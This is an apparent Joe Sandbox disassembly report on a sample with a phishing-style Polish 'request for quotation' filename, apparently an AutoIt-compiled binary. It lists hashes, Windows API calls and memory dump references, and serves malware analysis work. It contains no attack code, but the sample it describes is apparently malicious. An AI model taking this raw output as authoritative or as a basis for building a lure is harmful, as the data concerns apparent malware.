                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                      • API String ID: 867697134-248962490
                                                                                                                                                                                                                                                      • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                      • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                                                                                                                                                      • GetWindowDC.USER32 ref: 0044A277
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1744303182-0
                                                                                                                                                                                                                                                      • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                      • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                      • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                      • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                      • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                                                                                                                                      • strncnt.LIBCMT ref: 00428646
                                                                                                                                                                                                                                                      • strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1776594460-0
                                                                                                                                                                                                                                                      • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                      • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                                      • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                      • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00468107
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 3993528054-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                      • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                                                                                                                                                        • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                                                                                                        • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                      • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                      • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                      • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1504565804-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                      • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00455127
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                                                                                                                                                      • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00455207
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1663942905-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                      • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                      • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                                                                                                                                                      • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                                                                                                                                                      • API String ID: 2485709727-934586222
                                                                                                                                                                                                                                                      • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                      • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00434585
                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                                                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                                                                                                                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                                      • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                      • Opcode ID: 770037f5b0ff7f536cd68d347e59f283a70e312de6d16b75d95e978237f22954
                                                                                                                                                                                                                                                      • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 770037f5b0ff7f536cd68d347e59f283a70e312de6d16b75d95e978237f22954
